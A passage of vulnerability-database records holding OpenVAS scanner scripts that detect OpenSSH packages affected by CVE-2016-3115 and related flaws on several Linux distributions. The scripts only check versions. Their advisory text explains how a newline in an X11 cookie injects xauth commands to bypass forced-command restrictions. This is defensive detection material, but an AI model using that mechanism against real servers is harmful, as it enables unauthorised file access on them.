GmbH\");\n script_family(\"Fedora Local 
Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC23\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC23\")\n{\n\n if ((res = isrpmvuln(pkg:\"gsi-openssh\", rpm:\"gsi-openssh~7.2p2~1.fc23\", rls:\"FC23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 5.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:N"}}, {"lastseen": "2020-03-10T18:54:35", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-3115"], "description": "openssh xauth command injection may lead to forced-command and\n /bin/false bypass", "modified": "2020-03-06T00:00:00", "published": "2016-03-21T00:00:00", "id": "OPENVAS:1361412562310105581", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310105581", "type": "openvas", "title": "OpenSSH <= 7.2p1 - Xauth Injection", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# OpenSSH <= 7.2p1 - Xauth Injection\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:openbsd:openssh\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.105581\");\n script_version(\"2020-03-06T09:16:18+0000\");\n script_cve_id(\"CVE-2016-3115\");\n script_tag(name:\"cvss_base\", value:\"5.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:P/I:P/A:N\");\n script_tag(name:\"last_modification\", value:\"2020-03-06 09:16:18 +0000 (Fri, 06 Mar 2020)\");\n script_tag(name:\"creation_date\", value:\"2016-03-21 11:45:13 +0100 (Mon, 21 Mar 2016)\");\n script_name(\"OpenSSH <= 7.2p1 - Xauth Injection\");\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_category(ACT_GATHER_INFO);\n script_family(\"General\");\n script_dependencies(\"gb_openssh_consolidation.nasl\");\n script_mandatory_keys(\"openssh/detected\");\n\n script_xref(name:\"URL\", value:\"http://www.openssh.com/txt/release-7.2p2\");\n\n script_tag(name:\"summary\", value:\"openssh xauth command injection may lead to forced-command and\n /bin/false bypass\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"An authenticated user may inject arbitrary xauth commands by sending an\n x11 channel request that includes a newline character in the x11 cookie. The newline acts as a command\n separator to the xauth binary. 
This attack requires the server to have 'X11Forwarding yes' enabled.\n Disabling X11 forwarding mitigates this vector; upgrading to 7.2p2 or later fixes it.\");\n\n script_tag(name:\"impact\", value:\"By injecting xauth commands an authenticated user gains limited read/write access to arbitrary files,\n information leakage or xauth-connect capabilities.\");\n\n script_tag(name:\"affected\", value:\"OpenSSH versions before 7.2p2.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to OpenSSH version 7.2p2 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\n\nif( isnull( port = get_app_port( cpe:CPE ) ) )\n exit( 0 );\n\nif( ! infos = get_app_version_and_location( cpe:CPE, port:port, exit_no_version:TRUE ) )\n exit( 0 );\n\nvers = infos[\"version\"];\npath = infos[\"location\"];\n\nif( vers =~ \"^[0-6]\\.\" || vers =~ \"^7\\.[01]($|[^0-9])\" || vers =~ \"^7.2($|p1)\" ) {\n report = report_fixed_ver( installed_version:vers, fixed_version:\"7.2p2\", install_path:path );\n security_message( port:port, data:report );\n exit( 0 );\n}\n\nexit( 99 );", "cvss": {"score": 5.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:N"}}, {"lastseen": "2019-05-29T18:35:34", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-3115"], "description": "Mageia Linux Local Security Checks mgasa-2016-0108", "modified": "2019-03-14T00:00:00", "published": "2016-03-14T00:00:00", "id": "OPENVAS:1361412562310131265", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310131265", "type": "openvas", "title": "Mageia Linux Local Check: mgasa-2016-0108", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: mgasa-2016-0108.nasl 14180 2019-03-14 12:29:16Z cfischer $\n#\n# Mageia Linux security check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2016 Eero Volotinen, 
http://www.solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.131265\");\n script_version(\"$Revision: 14180 $\");\n script_tag(name:\"creation_date\", value:\"2016-03-14 15:57:15 +0200 (Mon, 14 Mar 2016)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-14 13:29:16 +0100 (Thu, 14 Mar 2019) $\");\n script_name(\"Mageia Linux Local Check: mgasa-2016-0108\");\n script_tag(name:\"insight\", value:\"Missing sanitisation of untrusted input allows an authenticated user who is able to request X11 forwarding to inject commands to xauth(1) (CVE-2016-3115).\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://advisories.mageia.org/MGASA-2016-0108.html\");\n script_cve_id(\"CVE-2016-3115\");\n script_tag(name:\"cvss_base\", value:\"5.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:P/I:P/A:N\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mageia_linux\", \"ssh/login/release\", re:\"ssh/login/release=MAGEIA5\");\n 
script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"Mageia Linux Local Security Checks mgasa-2016-0108\");\n script_copyright(\"Eero Volotinen\");\n script_family(\"Mageia Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"MAGEIA5\")\n{\nif ((res = isrpmvuln(pkg:\"openssh\", rpm:\"openssh~6.6p1~5.7.mga5\", rls:\"MAGEIA5\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 5.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:N"}}, {"lastseen": "2020-01-27T18:37:06", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-1908", "CVE-2016-3115"], "description": "The remote host is missing an update for the Huawei EulerOS\n ", "modified": "2020-01-23T00:00:00", "published": "2020-01-23T00:00:00", "id": "OPENVAS:1361412562311220161008", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562311220161008", "type": "openvas", "title": "Huawei EulerOS: Security Advisory for openssh (EulerOS-SA-2016-1008)", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.1.2.2016.1008\");\n script_version(\"2020-01-23T10:37:23+0000\");\n script_cve_id(\"CVE-2016-1908\", \"CVE-2016-3115\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-01-23 10:37:23 +0000 (Thu, 23 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-23 10:37:23 +0000 (Thu, 23 Jan 2020)\");\n script_name(\"Huawei EulerOS: Security Advisory for openssh (EulerOS-SA-2016-1008)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei EulerOS Local Security Checks\");\n script_dependencies(\"gb_huawei_euleros_consolidation.nasl\");\n script_mandatory_keys(\"ssh/login/euleros\", \"ssh/login/rpms\", re:\"ssh/login/release=EULEROS-2\\.0SP1\");\n\n script_xref(name:\"EulerOS-SA\", value:\"2016-1008\");\n script_xref(name:\"URL\", value:\"https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2016-1008\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the Huawei EulerOS\n 'openssh' package(s) announced via the EulerOS-SA-2016-1008 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"It was discovered that the OpenSSH server did not sanitize data received in requests to enable X11 forwarding. An authenticated client with restricted SSH access could possibly use this flaw to bypass intended restrictions. 
(CVE-2016-3115)\n\nAn access flaw was discovered in OpenSSH, the OpenSSH client did not correctly handle failures to generate authentication cookies for untrusted X11 forwarding. A malicious or compromised remote X application could possibly use this flaw to establish a trusted connection to the local X server, even if only untrusted X11 forwarding was requested. (CVE-2016-1908)\");\n\n script_tag(name:\"affected\", value:\"'openssh' package(s) on Huawei EulerOS V2.0SP1.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"EULEROS-2.0SP1\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"openssh\", rpm:\"openssh~6.6.1p1~25.4.h3\", rls:\"EULEROS-2.0SP1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"openssh-askpass\", rpm:\"openssh-askpass~6.6.1p1~25.4.h3\", rls:\"EULEROS-2.0SP1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"openssh-clients\", rpm:\"openssh-clients~6.6.1p1~25.4.h3\", rls:\"EULEROS-2.0SP1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"openssh-keycat\", rpm:\"openssh-keycat~6.6.1p1~25.4.h3\", rls:\"EULEROS-2.0SP1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"openssh-server\", rpm:\"openssh-server~6.6.1p1~25.4.h3\", rls:\"EULEROS-2.0SP1\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:35:13", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-1908", "CVE-2016-3115"], "description": "Check the version of openssh", "modified": "2019-03-08T00:00:00", 
"published": "2016-03-22T00:00:00", "id": "OPENVAS:1361412562310882432", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310882432", "type": "openvas", "title": "CentOS Update for openssh CESA-2016:0465 centos7", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for openssh CESA-2016:0465 centos7\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.882432\");\n script_version(\"$Revision: 14058 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-08 14:25:52 +0100 (Fri, 08 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-03-22 06:12:50 +0100 (Tue, 22 Mar 2016)\");\n script_cve_id(\"CVE-2016-1908\", \"CVE-2016-3115\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"CentOS Update for openssh CESA-2016:0465 centos7\");\n script_tag(name:\"summary\", value:\"Check the version of openssh\");\n 
 script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"OpenSSH is OpenBSD's SSH (Secure Shell)\nprotocol implementation. These packages include the core files necessary for\nboth the OpenSSH client and server.\n\nIt was discovered that the OpenSSH server did not sanitize data received\nin requests to enable X11 forwarding. An authenticated client with\nrestricted SSH access could possibly use this flaw to bypass intended\nrestrictions. (CVE-2016-3115)\n\nAn access flaw was discovered in OpenSSH: the OpenSSH client did not\ncorrectly handle failures to generate authentication cookies for untrusted\nX11 forwarding. A malicious or compromised remote X application could\npossibly use this flaw to establish a trusted connection to the local X\nserver, even if only untrusted X11 forwarding was requested.\n(CVE-2016-1908)\n\nAll openssh users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues. 
After installing this\nupdate, the OpenSSH server daemon (sshd) will be restarted automatically.\");\n script_tag(name:\"affected\", value:\"openssh on CentOS 7\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"CESA\", value:\"2016:0465\");\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2016-March/021746.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS7\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS7\")\n{\n\n if ((res = isrpmvuln(pkg:\"openssh\", rpm:\"openssh~6.6.1p1~25.el7_2\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"openssh-askpass\", rpm:\"openssh-askpass~6.6.1p1~25.el7_2\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"openssh-clients\", rpm:\"openssh-clients~6.6.1p1~25.el7_2\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"openssh-keycat\", rpm:\"openssh-keycat~6.6.1p1~25.el7_2\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"openssh-ldap\", rpm:\"openssh-ldap~6.6.1p1~25.el7_2\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"openssh-server\", rpm:\"openssh-server~6.6.1p1~25.el7_2\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = 
isrpmvuln(pkg:\"openssh-server-sysvinit\", rpm:\"openssh-server-sysvinit~6.6.1p1~25.el7_2\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"pam_ssh_agent_auth\", rpm:\"pam_ssh_agent_auth~0.9.3~9.25.el7_2\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:35:07", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-1908", "CVE-2016-3115"], "description": "The remote host is missing an update for the ", "modified": "2018-11-23T00:00:00", "published": "2016-03-22T00:00:00", "id": "OPENVAS:1361412562310871580", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310871580", "type": "openvas", "title": "RedHat Update for openssh RHSA-2016:0465-01", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for openssh RHSA-2016:0465-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.871580\");\n script_version(\"$Revision: 12497 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-23 09:28:21 +0100 (Fri, 23 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2016-03-22 06:12:30 +0100 (Tue, 22 Mar 2016)\");\n script_cve_id(\"CVE-2016-1908\", \"CVE-2016-3115\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"RedHat Update for openssh RHSA-2016:0465-01\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'openssh'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"OpenSSH is OpenBSD's SSH (Secure Shell)\nprotocol implementation. These packages include the core files necessary for both\nthe OpenSSH client and server.\n\nIt was discovered that the OpenSSH server did not sanitize data received\nin requests to enable X11 forwarding. An authenticated client with\nrestricted SSH access could possibly use this flaw to bypass intended\nrestrictions. (CVE-2016-3115)\n\nAn access flaw was discovered in OpenSSH: the OpenSSH client did not\ncorrectly handle failures to generate authentication cookies for untrusted\nX11 forwarding. 
A malicious or compromised remote X application could\npossibly use this flaw to establish a trusted connection to the local X\nserver, even if only untrusted X11 forwarding was requested.\n(CVE-2016-1908)\n\nAll openssh users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues. After installing this\nupdate, the OpenSSH server daemon (sshd) will be restarted automatically.\");\n script_tag(name:\"affected\", value:\"openssh on Red Hat Enterprise Linux Server (v. 7)\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"RHSA\", value:\"2016:0465-01\");\n script_xref(name:\"URL\", value:\"https://www.redhat.com/archives/rhsa-announce/2016-March/msg00052.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\", re:\"ssh/login/release=RHENT_7\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"RHENT_7\")\n{\n\n if ((res = isrpmvuln(pkg:\"openssh\", rpm:\"openssh~6.6.1p1~25.el7_2\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"openssh-askpass\", rpm:\"openssh-askpass~6.6.1p1~25.el7_2\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"openssh-clients\", rpm:\"openssh-clients~6.6.1p1~25.el7_2\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"openssh-debuginfo\", rpm:\"openssh-debuginfo~6.6.1p1~25.el7_2\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n 
if ((res = isrpmvuln(pkg:\"openssh-keycat\", rpm:\"openssh-keycat~6.6.1p1~25.el7_2\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"openssh-server\", rpm:\"openssh-server~6.6.1p1~25.el7_2\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:35:49", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-5600", "CVE-2016-3115"], "description": "Oracle Linux Local Security Checks ELSA-2016-3531", "modified": "2019-03-14T00:00:00", "published": "2016-04-06T00:00:00", "id": "OPENVAS:1361412562310122921", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310122921", "type": "openvas", "title": "Oracle Linux Local Check: ELSA-2016-3531", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: ELSA-2016-3531.nasl 14180 2019-03-14 12:29:16Z cfischer $\n#\n# Oracle Linux Local Check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.fi>\n#\n# Copyright:\n# Copyright (c) 2016 Eero Volotinen, http://solinor.fi\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.122921\");\n script_version(\"$Revision: 14180 $\");\n script_tag(name:\"creation_date\", value:\"2016-04-06 14:33:00 +0300 (Wed, 06 Apr 2016)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-14 13:29:16 +0100 (Thu, 14 Mar 2019) $\");\n script_name(\"Oracle Linux Local Check: ELSA-2016-3531\");\n script_tag(name:\"insight\", value:\"ELSA-2016-3531 - openssh security update. Please see the references for more insight.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"summary\", value:\"Oracle Linux Local Security Checks ELSA-2016-3531\");\n script_xref(name:\"URL\", value:\"http://linux.oracle.com/errata/ELSA-2016-3531.html\");\n script_cve_id(\"CVE-2015-5600\", \"CVE-2016-3115\");\n script_tag(name:\"cvss_base\", value:\"8.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/oracle_linux\", \"ssh/login/release\", re:\"ssh/login/release=OracleLinux5\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Eero Volotinen\");\n script_family(\"Oracle Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"OracleLinux5\")\n{\n if ((res = isrpmvuln(pkg:\"openssh\", 
rpm:\"openssh~4.3p2~82.0.2.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"openssh-askpass\", rpm:\"openssh-askpass~4.3p2~82.0.2.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"openssh-clients\", rpm:\"openssh-clients~4.3p2~82.0.2.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"openssh-server\", rpm:\"openssh-server~4.3p2~82.0.2.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif (__pkg_match) exit(99);\n exit(0);\n\n", "cvss": {"score": 8.5, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:C"}}, {"lastseen": "2019-05-29T18:35:31", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-5600", "CVE-2016-3115"], "description": "The remote host is missing an update for the ", "modified": "2018-11-23T00:00:00", "published": "2016-03-22T00:00:00", "id": "OPENVAS:1361412562310871579", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310871579", "type": "openvas", "title": "RedHat Update for openssh RHSA-2016:0466-01", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for openssh RHSA-2016:0466-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.871579\");\n script_version(\"$Revision: 12497 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-23 09:28:21 +0100 (Fri, 23 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2016-03-22 06:12:28 +0100 (Tue, 22 Mar 2016)\");\n script_cve_id(\"CVE-2015-5600\", \"CVE-2016-3115\");\n script_tag(name:\"cvss_base\", value:\"8.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"RedHat Update for openssh RHSA-2016:0466-01\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'openssh'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"OpenSSH is OpenBSD's SSH (Secure Shell)\nprotocol implementation. These packages include the core files necessary for both\nthe OpenSSH client and server.\n\nIt was discovered that the OpenSSH server did not sanitize data received\nin requests to enable X11 forwarding. An authenticated client with\nrestricted SSH access could possibly use this flaw to bypass intended\nrestrictions. (CVE-2016-3115)\n\nIt was discovered that the OpenSSH 